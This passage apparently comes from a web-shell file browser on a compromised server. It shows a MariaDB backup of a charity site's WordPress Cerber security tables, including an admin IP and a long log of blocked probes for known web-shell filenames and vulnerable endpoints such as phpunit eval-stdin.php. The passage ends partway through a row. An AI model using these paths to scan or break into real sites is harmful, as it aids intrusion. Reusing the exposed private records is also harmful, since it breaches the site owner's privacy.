HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: healthinsuranceukorguk (1111)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //restore/20230201.equalitywalkorguk.sql
-- MariaDB dump 10.19  Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: equalitywalkorguk
-- ------------------------------------------------------
-- Server version	10.5.18-MariaDB-1:10.5.18+maria~ubu2004

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `equalitywalkorguk`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `equalitywalkorguk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;

USE `equalitywalkorguk`;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
INSERT INTO `cerber_acl` VALUES ('185.175.113.72',3115282760,3115282760,'W','My IP address',0,0,'','');
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
INSERT INTO `cerber_log` VALUES ('20.127.168.18',343910418,'',0,1672764431.5336,55,'GwVotMbCdIKl0xSkeT5iRP8j','','19|0|0|0|equalitywalk.org.uk/wp-plain.php'),('20.127.168.18',343910418,'',0,1672764431.8147,55,'QJB6z9NCcktApgn47THqDS8j','','19|0|0|0|equalitywalk.org.uk/lagpiyap.php'),('20.127.168.18',343910418,'',0,1672764432.7758,55,'FmxYipaDIkVzyh40v7Tj8Qe2','','19|0|0|0|www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php'),('20.127.168.18',343910418,'',0,1672764433.1995,55,'j593nyKwDcd4XUg7J8x1hfvV','','19|0|0|0|www.equalitywalk.org.uk/plugins/content/apismtp/apismtp.php.suspected'),('52.141.49.8',881668360,'',0,1672776304.1684,55,'Hvc4P9MdN1YJTfnaER8sODKy','','19|0|0|0|equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('52.141.49.8',881668360,'',0,1672777417.4679,55,'30fWtHJNg1c6IkvAYudXBLym','','19|0|0|0|www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('194.38.20.161',3257275553,'',0,1673434960.3291,55,'Dt38JN2rcFYfPpG1eAuqkRTz','','19|0|0|0|equalitywalk.org.uk/sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php'),('66.23.225.248',1108861432,'',0,1673454992.3834,55,'6fe9RNO5YKW1wtHnEZ27yzsS','','19|0|0|0|www.equalitywalk.org.uk/phpinfo.php'),('66.23.225.248',1108861432,'',0,1673455008.5072,55,'UZn56EH4r2kpSufNahzsIPo9','','19|0|0|0|www.equalitywalk.org.uk/info.php'),('66.23.225.248',1108861432,'',0,1673455464.2975,55,'43m6vxsOpPjWL2hFtRISCGNH','','19|0|0|0|equalitywalk.org.uk/phpinfo.php'),('66.23.225.248',1108861432,'',0,1673455486.3207,55,'QiFKPMfXDycWO5zE0gpaAtvL','','19|0|0|0|equalitywalk.org.uk/info.php'),('185.36.81.21',3106165013,'',0,1673461902.6914,55,'8ZRMEIs0h31QjJiCaqfHS9op','','19|0|0|0|equalitywalk.org.uk/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php'),('194.38.20.161',3257275553,'',0,1673502089.1380,55,'Cl1AhzU5sGwQeToD3KPRtYg8','','19|0|0|0|equalitywalk.org.uk/sites/default/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php'),('194.38.20.161',3257275553,'',0,1673502089.4914,55,'aY8ZRypxJUE4Po7LhTNfdQnS','','19|0|0|0|equalitywalk.org.uk/sites/all/modules/contrib/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php'),('81.19.135.24',1360234264,'',0,1673524644.9704,55,'kMtCTI2Gl9mzUSORDgpZe034','','19|0|0|0|www.equalitywalk.org.uk/style.php'),('81.19.135.24',1360234264,'',0,1673524645.3609,55,'Zj348yghsxiNP7UKGO2d0vCk','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/style.php'),('81.19.135.24',1360234264,'',0,1673524646.0405,55,'imZYcfQCdeIr2oTqE6OgxFt8','','19|0|0|0|www.equalitywalk.org.uk/s_e.php'),('81.19.135.24',1360234264,'',0,1673524646.7975,55,'iCeSsB36p4GAnJyFXIgmovtV','','19|0|0|0|www.equalitywalk.org.uk/s_ne.php'),('81.19.135.24',1360234264,'',0,1673524647.3809,55,'wTFObsnqGxXACL6RZgWINh2p','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('81.19.135.24',1360234264,'',0,1673524647.4120,10,'wTFObsnqGxXACL6RZgWINh2p','','707|0|0|0|www.equalitywalk.org.uk/1index.php'),('81.19.135.24',1360234264,'',0,1673524647.9049,100,'0ZytwIHo1kP8aS4lR9WnmFds','','13|0|0|0|www.equalitywalk.org.uk/3index.php'),('81.19.135.24',1360234264,'',0,1673524648.4790,100,'GJAWfdxiP3hjMEZ0QTeR1l64','','13|0|0|0|www.equalitywalk.org.uk/wikindex.php'),('81.19.135.24',1360234264,'',0,1673524649.3568,55,'oKgrb3EZcytNL5qjmn8TdQ2e','','19|0|0|0|www.equalitywalk.org.uk/radio.php'),('81.19.135.24',1360234264,'',0,1673524649.9528,100,'pYAl3BFCWumH7IJDrMPy0nXh','','13|0|0|0|www.equalitywalk.org.uk/lock360.php'),('81.19.135.24',1360234264,'',0,1673524650.7182,100,'S7EJtCGnPWMaiDYld4UVoyKc','','13|0|0|0|www.equalitywalk.org.uk/wp-load.php'),('81.19.135.24',1360234264,'',0,1673524651.1461,100,'STBFsrgHbEVjGn3Rq2Uz5clo','','13|0|0|0|www.equalitywalk.org.uk/old-index.php'),('81.19.135.24',1360234264,'',0,1673524651.5503,100,'A6HaRrqJ4CO8kEeT1p0GzdYL','','13|0|0|0|www.equalitywalk.org.uk/xmrlpc.php'),('81.19.135.24',1360234264,'',0,1673524652.1836,100,'M193UpsVxonyBXCgkhe6zQfd','','13|0|0|0|www.equalitywalk.org.uk/xmlrpcs.php'),('81.19.135.24',1360234264,'',0,1673524652.7282,100,'As5EqUynuY7N8ohMblIFx9OP','','13|0|0|0|www.equalitywalk.org.uk/wp-admin.php'),('81.19.135.24',1360234264,'',0,1673524653.2856,100,'KONmqugdZfaIWL1G6BJbPw0D','','13|0|0|0|www.equalitywalk.org.uk/qindex.php'),('81.19.135.24',1360234264,'',0,1673524653.9628,55,'CiKfLUy3lbAr9sk4nOSvgVxX','','19|0|0|0|www.equalitywalk.org.uk/doc.php'),('81.19.135.24',1360234264,'',0,1673524654.3367,55,'2Yz5rgItVpoHa3bSPevZ7DUX','','19|0|0|0|www.equalitywalk.org.uk/wp_wrong_datlib.php'),('81.19.135.24',1360234264,'',0,1673524654.9965,55,'UiZ6WRm4bqta7hzOMGySwPpD','','19|0|0|0|www.equalitywalk.org.uk/beence.php'),('81.19.135.24',1360234264,'',0,1673524655.4104,55,'5Sewa94brlHU0KmhL78cxZFG','','19|0|0|0|www.equalitywalk.org.uk/ups.php'),('81.19.135.24',1360234264,'',0,1673524655.7893,100,'36C2Nv7WKBjec8QksZ4hYiIM','','13|0|0|0|www.equalitywalk.org.uk/wp-signin.php'),('81.19.135.24',1360234264,'',0,1673524656.2203,55,'Nn4iUy7vJY6lmsV2AabLZw8o','','19|0|0|0|www.equalitywalk.org.uk/media-admin.php'),('81.19.135.24',1360234264,'',0,1673524656.5588,55,'oIq4819utD0O7eKbxSgrPnVJ','','19|0|0|0|www.equalitywalk.org.uk/export.php'),('81.19.135.24',1360234264,'',0,1673524657.0412,55,'Sa9qcURYyKehV5OXzJL6BZjd','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('81.19.135.24',1360234264,'',0,1673524657.4193,55,'hoLU6FuTS1nEevwPbB92Dy7r','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-atom.php'),('81.19.135.24',1360234264,'',0,1673524657.8086,55,'AOIJzflnGV6T5vmMLjyNcCS8','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/images/css.php'),('81.19.135.24',1360234264,'',0,1673524657.9598,55,'G3EOUQP0qWoTJeayXx9v6gSd','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('81.19.135.24',1360234264,'',0,1673524658.3213,55,'y4FotgQJ2ibYa8LUD9CkmuBI','','19|0|0|0|www.equalitywalk.org.uk/defau1t.php'),('81.19.135.24',1360234264,'',0,1673524658.6598,55,'KMXBp1buExDhZI2nsJYW4Hjq','','19|0|0|0|www.equalitywalk.org.uk/css.php'),('81.19.135.24',1360234264,'',0,1673524659.4141,55,'Mpe4ok5FR0GCtLcWaQOlEmUI','','19|0|0|0|www.equalitywalk.org.uk/moduless.php'),('81.19.135.24',1360234264,'',0,1673524660.0549,55,'3j2QAtPye78wUDGd4TMJSEgB','','19|0|0|0|www.equalitywalk.org.uk/wp-booking.php'),('81.19.135.24',1360234264,'',0,1673524661.0890,55,'avDJrEcf75UKqnwA4ZMgh0Cp','','19|0|0|0|www.equalitywalk.org.uk/config.bak.php'),('81.19.135.24',1360234264,'',0,1673524661.5106,55,'ytpEaB85LWH34VmN6rqMDjYR','','19|0|0|0|www.equalitywalk.org.uk/legion.php'),('81.19.135.24',1360234264,'',0,1673524662.2377,55,'cdz6VhK5ekO8tuSlmYx09LGN','','19|0|0|0|www.equalitywalk.org.uk/wp-plugins.php'),('81.19.135.24',1360234264,'',0,1673524662.6629,55,'QNlkz1jDq8HGciBnxVgAMty6','','19|0|0|0|www.equalitywalk.org.uk/gank.php.PhP'),('81.19.135.24',1360234264,'',0,1673524663.2476,55,'kDhpo3WQ9E7mz1n4jtfxclYy','','19|0|0|0|www.equalitywalk.org.uk/archives.php'),('81.19.135.24',1360234264,'',0,1673524663.9436,55,'sehuFwHMi9NzYTCOkVL4ZjKb','','19|0|0|0|www.equalitywalk.org.uk/xindex.php'),('81.19.135.24',1360234264,'',0,1673524664.3470,55,'m2FuUHO7d5ZarnoQteGlKbwC','','19|0|0|0|www.equalitywalk.org.uk/defau11.php'),('81.19.135.24',1360234264,'',0,1673524664.9624,100,'prNnZBxECvaz4mQjkA0HdFDW','','13|0|0|0|www.equalitywalk.org.uk/system_log.php'),('81.19.135.24',1360234264,'',0,1673524665.3677,55,'oEmHB1DhGUvxt9b0wCWTza58','','19|0|0|0|www.equalitywalk.org.uk/wp-backup-sql-302.php'),('81.19.135.24',1360234264,'',0,1673524665.7875,100,'tRGhJ83yoOQLuAZ7gzr4CMs1','','13|0|0|0|www.equalitywalk.org.uk/error.php'),('81.19.135.24',1360234264,'',0,1673524678.5036,100,'l4EiQLP8fd57huDOnU6jv9Te','','13|0|0|0|www.equalitywalk.org.uk/index.php'),('81.19.135.24',1360234264,'',0,1673524678.6952,55,'EPuhvil9k5J7QG2MTbBxnXI3','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('81.19.135.24',1360234264,'',0,1673524678.9585,55,'PIdxmgQHeC4wpOBLGjcYfEl5','','19|0|0|0|www.equalitywalk.org.uk/shells.php'),('81.19.135.24',1360234264,'',0,1673524679.1392,55,'2btlPkur5zojnysNhTZUQSiw','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('81.19.135.24',1360234264,'',0,1673524679.3171,55,'Q8DSKwkXoWCvHzm5tlIYqfP2','','19|0|0|0|www.equalitywalk.org.uk/xleet.php'),('81.19.135.24',1360234264,'',0,1673524679.4856,55,'g2Qd6Msh13JZiP9rjxcAXGTY','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('81.19.135.24',1360234264,'',0,1673524679.6822,55,'LIxcw87XrWRNvEjgVyMtu35Y','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('81.19.135.24',1360234264,'',0,1673524679.8598,55,'4NBCQOS2PlDRj5oJwaGsf8Ug','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('81.19.135.24',1360234264,'',0,1673524680.0762,55,'y8tkPqG7hL0dJV9mB1uof34X','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('81.19.135.24',1360234264,'',0,1673524680.2808,55,'eHKP1t0FUcWpj4sMvldXy3ZO','','19|0|0|0|www.equalitywalk.org.uk/1.php'),('81.19.135.24',1360234264,'',0,1673524680.4567,55,'nXBK36LbxsU8oTf2aphD9eQ0','','19|0|0|0|www.equalitywalk.org.uk/x.php'),('81.19.135.24',1360234264,'',0,1673524680.6795,55,'n8g7cyHshJoxfZ0Ep9d6LqrB','','19|0|0|0|www.equalitywalk.org.uk/z.php'),('81.19.135.24',1360234264,'',0,1673524680.8433,55,'cvTXwIYAnu1720jaGD6xyH5Q','','19|0|0|0|www.equalitywalk.org.uk/a.php'),('81.19.135.24',1360234264,'',0,1673524680.9996,55,'sYeXQidOqZ8GoMwRNtm2SIjc','','19|0|0|0|www.equalitywalk.org.uk/test.php'),('81.19.135.24',1360234264,'',0,1673524681.2150,55,'avohFCBHKUZ3VLTcdtb79knw','','19|0|0|0|www.equalitywalk.org.uk/wp.php'),('81.19.135.24',1360234264,'',0,1673524681.3945,55,'ZrNn09WJwmkM2xgEfHXS1TzD','','19|0|0|0|www.equalitywalk.org.uk/alfa.php'),('81.19.135.24',1360234264,'',0,1673524681.6036,55,'6hOHB0JXMisdZWoL7j9wx4bV','','19|0|0|0|www.equalitywalk.org.uk/config.php'),('81.19.135.24',1360234264,'',0,1673524681.8902,55,'b56SkMlmzh7yULiq8opvBsuw','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/index.php'),('162.214.159.190',2731974590,'',0,1673536338.7772,55,'XDoUkNCRvIKVpdfAhcWHPiab','','19|0|0|0|equalitywalk.org.uk/UOvRd/wp-blog.php'),('125.65.228.154',2101470362,'',0,1673550014.6933,55,'GQRNJZrvBKiya0nPApIXkUtx','','19|0|0|0|www.equalitywalk.org.uk/editor/login_admin.asp'),('66.23.225.248',1108861432,'',0,1673550754.4767,55,'wMj8A7m6O5vFhergDxHuVLTC','','19|0|0|0|www.equalitywalk.org.uk/phpinfo.php'),('66.23.225.248',1108861432,'',0,1673550765.8745,55,'aHj4nBiKF50w3f8qACgXWQxM','','19|0|0|0|www.equalitywalk.org.uk/info.php'),('66.23.225.248',1108861432,'',0,1673551118.4107,55,'PLHUd14Drq2uZtnwOSXhTERA','','19|0|0|0|equalitywalk.org.uk/phpinfo.php'),('66.23.225.248',1108861432,'',0,1673551140.2384,55,'XAEIYTgpHkoDCOKmxaMFZBnN','','19|0|0|0|equalitywalk.org.uk/info.php'),('164.90.168.36',2757404708,'',0,1673558397.5521,55,'wLD9itBQaZPlvMW17JqxKfc4','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/wp-admin.php'),('164.90.168.36',2757404708,'',0,1673558397.7392,55,'cgZtV0O1A5GSwERPLkujrzbn','','19|0|0|0|www.equalitywalk.org.uk/wp-admin.php'),('164.90.168.36',2757404708,'',0,1673558397.9941,55,'sTR0BpHg97uLAtCGIx8EOc3y','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-includes.php'),('164.90.168.36',2757404708,'',0,1673558398.1568,55,'VkiCDPmLKuwFH24NZBJTArcl','','19|0|0|0|www.equalitywalk.org.uk/123.php'),('164.90.168.36',2757404708,'',0,1673558398.3562,55,'nd9hlNe7fV36jA5zGiQCIxPt','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/js/widgets/index.php'),('164.90.168.36',2757404708,'',0,1673558398.3937,10,'nd9hlNe7fV36jA5zGiQCIxPt','','707|0|0|0|www.equalitywalk.org.uk/wp-admin/js/widgets/index.php'),('164.90.168.36',2757404708,'',0,1673558398.5963,55,'J58oXiuKZ6p9efthlEVa7Unv','','19|0|0|0|www.equalitywalk.org.uk/nf_tracking.php'),('164.90.168.36',2757404708,'',0,1673558398.7600,55,'lyoHxwmVUKCIYvAqzuhpWFT1','','19|0|0|0|www.equalitywalk.org.uk/nin.php'),('164.90.168.36',2757404708,'',0,1673558398.9279,55,'GqPmehkuw5NXAS4OQaj6sJlr','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/css/colors/blue/nin.php'),('45.32.121.47',757102895,'',0,1673558401.3699,55,'1x9XWDe05LIuYEmjnfUzGkvR','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/wp-admin.php'),('45.32.121.47',757102895,'',0,1673558402.9903,55,'Fdh0NQU7GPuRKqzI8EYH3pkD','','19|0|0|0|www.equalitywalk.org.uk/wp-admin.php'),('45.32.121.47',757102895,'',0,1673558406.2536,55,'OyACaWfovVXz3SmFUIHhRidP','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-includes.php'),('45.32.121.47',757102895,'',0,1673558408.2662,55,'T3Wt1pgoj0r8MN4qmHZylQaR','','19|0|0|0|www.equalitywalk.org.uk/123.php'),('45.32.121.47',757102895,'',0,1673558409.9893,55,'AfGBxr2s8eHgIm1jqoOCbYl9','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/js/widgets/index.php'),('45.32.121.47',757102895,'',0,1673558410.0288,10,'AfGBxr2s8eHgIm1jqoOCbYl9','','707|0|0|0|www.equalitywalk.org.uk/wp-admin/js/widgets/index.php'),('45.32.121.47',757102895,'',0,1673558411.1729,55,'mBXDsAiGvld3VhCWrjQt8KT2','','19|0|0|0|www.equalitywalk.org.uk/nf_tracking.php'),('45.32.121.47',757102895,'',0,1673558412.2867,55,'MEgk7PYoZTVNQzaXJjylwim8','','19|0|0|0|www.equalitywalk.org.uk/nin.php'),('45.32.121.47',757102895,'',0,1673558413.3487,55,'y9fxz6wWM1kgeObja2oqAdFi','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/css/colors/blue/nin.php'),('216.131.104.16',3632490512,'',0,1673559088.6643,55,'qZeXcT6ERzoyb3K7kuWV2DCf','','19|0|0|0|www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('168.119.149.8',2826409224,'',0,1673563588.5264,55,'mTU1PxwQhkYF6KZON9CVM0fy','','19|0|0|0|equalitywalk.org.uk/foMeaJ/wp-blog.php'),('194.38.20.161',3257275553,'',0,1673570814.1218,55,'RAEa1ISxrLqK4dsXFVJDeNWU','','19|0|0|0|equalitywalk.org.uk/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php'),('172.105.74.85',2892581461,'',0,1673575979.6953,55,'WcNMyHgB7QRqmfpAEousOPJn','','19|0|0|0|equalitywalk.org.uk/PNJOZ/wp-blog.php'),('172.105.74.85',2892581461,'',0,1673575980.4370,55,'C0c1LvlqRbiznE2Kg6ZrBW9A','','19|0|0|0|equalitywalk.org.uk/PNJOZ/wp-blog.php'),('216.131.104.15',3632490511,'',0,1673584992.4357,55,'vnVWR4pCUxcjemINslKqHgtd','','19|0|0|0|www.equalitywalk.org.uk/style.php'),('216.131.104.15',3632490511,'',0,1673584993.5946,55,'AJId2mZpOEq0UNeWfFTa8Rjs','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/style.php'),('216.131.104.15',3632490511,'',0,1673584994.8660,55,'yaCnTG6rjkcxHe5sR8XMtEKq','','19|0|0|0|www.equalitywalk.org.uk/s_e.php'),('216.131.104.15',3632490511,'',0,1673584996.0408,55,'M7iKyernQ5x08Gm4AqBjfLsh','','19|0|0|0|www.equalitywalk.org.uk/s_ne.php'),('216.131.104.15',3632490511,'',0,1673584997.3857,55,'exsVAzrfM0CYhinI5ucPTtGX','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('216.131.104.15',3632490511,'',0,1673584997.3985,10,'exsVAzrfM0CYhinI5ucPTtGX','','707|0|0|0|www.equalitywalk.org.uk/1index.php'),('216.131.104.15',3632490511,'',0,1673584998.6349,55,'3lXB8dvCfM54WPDmtFcZ0JN1','','19|0|0|0|www.equalitywalk.org.uk/radio.php'),('216.131.104.15',3632490511,'',0,1673585000.0901,55,'tl01Va5JpUNhGCbEif9vFKM6','','19|0|0|0|www.equalitywalk.org.uk/doc.php'),('216.131.104.15',3632490511,'',0,1673585001.9340,55,'sMIApgnO9XDQh1aqCHYP8Rvl','','19|0|0|0|www.equalitywalk.org.uk/wp_wrong_datlib.php'),('216.131.104.15',3632490511,'',0,1673585046.3253,55,'2L6hQTwXgOpIlENa3uGdZJKU','','19|0|0|0|www.equalitywalk.org.uk/beence.php'),('216.131.104.15',3632490511,'',0,1673585065.8737,55,'xDRCgNimYZbqKfzQGL3UPnMj','','19|0|0|0|www.equalitywalk.org.uk/ups.php'),('216.131.104.15',3632490511,'',0,1673585067.2310,100,'zdwXPgVJWUOTYBs2mHGeNtEA','','13|0|0|0|www.equalitywalk.org.uk/wp-signin.php'),('216.131.104.15',3632490511,'',0,1673585068.7338,55,'Vj3AI8DNoXh19aeOuRBxtLW7','','19|0|0|0|www.equalitywalk.org.uk/media-admin.php'),('216.131.104.15',3632490511,'',0,1673585071.0150,55,'hzyHuas1lOtrnPWGXEqcj2NA','','19|0|0|0|www.equalitywalk.org.uk/export.php'),('216.131.104.15',3632490511,'',0,1673585072.7388,55,'wV9YD04FvXCOnBjr3So6dAgi','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('216.131.104.15',3632490511,'',0,1673585074.9390,55,'Agb03u91I4QL7GXM5OP8JfEv','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-atom.php'),('216.131.104.15',3632490511,'',0,1673585113.7631,55,'Dv1H7GCuZg6N9JKOqSljBQYA','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/images/css.php'),('216.131.104.15',3632490511,'',0,1673585143.3189,55,'exJyCoEk5GSjm7sb19BNR6Wv','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('216.131.104.15',3632490511,'',0,1673585179.5361,55,'d3TGLQrBsMkyOFl6nXmtx7wP','','19|0|0